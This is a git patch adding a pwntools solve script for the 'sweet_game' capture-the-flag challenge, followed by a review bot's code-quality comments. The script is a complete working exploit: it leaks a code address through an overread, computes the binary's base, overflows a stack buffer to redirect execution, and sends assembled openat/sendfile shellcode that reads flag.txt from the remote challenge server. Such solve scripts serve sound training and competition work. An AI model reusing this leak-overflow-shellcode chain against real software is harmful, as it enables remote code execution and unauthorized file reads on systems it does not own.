From 0cccb2f164d41ce2dcfa2d2fd79a47994bd12fd1 Mon Sep 17 00:00:00 2001
From: jc
Date: Tue, 22 Oct 2024 01:51:17 +0300
Subject: [PATCH] solve script

---
 africabattlectf_2024/sweet_game/a.py | 46 ++++++++++++++++++++++++++++
 1 file changed, 46 insertions(+)
 create mode 100644 africabattlectf_2024/sweet_game/a.py

diff --git a/africabattlectf_2024/sweet_game/a.py b/africabattlectf_2024/sweet_game/a.py
new file mode 100644
index 0000000..c7729eb
--- /dev/null
+++ b/africabattlectf_2024/sweet_game/a.py
@@ -0,0 +1,46 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./sweet_game", checksec=False)
+# r = process()
+r = remote("challenge.bugpwn.com", 1001)
+
+offset = 48
+
+# leak
+buf = b"A"*66
+r.sendafter(b": ", buf)
+r.recvuntil(b"A"*66)
+main = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("main: 0x%lx", main)
+elf_base = main - 0x15bc
+log.info("elf_base: 0x%lx", elf_base)
+call_shellcode = elf_base + 0x16d2
+log.info("call_shellcode: 0x%lx", call_shellcode)
+
+# jump
+buf = b"A"*offset
+buf += p64(call_shellcode)
+r.sendlineafter(b": ", buf)
+
+# openat + sendfile
+shellcode="""
+lea rsi, [rdx+38]
+mov edi, -100
+xor rdx, rdx
+xor r10, r10
+add ax, 257
+syscall
+xor rsi, rsi
+mov rsi, rax
+mov al, 40
+shr edi, 255
+add r10b, 255
+syscall
+"""
+shellcode = asm(shellcode)
+shellcode += b"flag.txt\0"
+r.sendlineafter(b": ", shellcode)
+
+r.interactive()
\ No newline at end of file
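Review bot: The leak at `main = u64(r.recv(6).ljust(8, b"\x00"))` is not guaranteed to read six bytes — a pwntools tube's `recv(6)` returns whatever is already buffered, up to six, so a short read silently yields a wrong `main` and every address derived from it; `r.recvn(6)` blocks until exactly six bytes have arrived. The constants `66`, `offset = 48`, `0x15bc` and `0x16d2` are tied to one specific build of `./sweet_game` and are nowhere explained, so a comment such as `# offsets taken from this build of ./sweet_game: main at 0x15bc, call_shellcode at 0x16d2 — re-derive if the binary changes` next to `elf_base = main - 0x15bc` would keep the script reproducible. `target` is bound on the `context.binary` line but never used, and `shellcode="""` lacks the spaces around `=` used on every other assignment in the file.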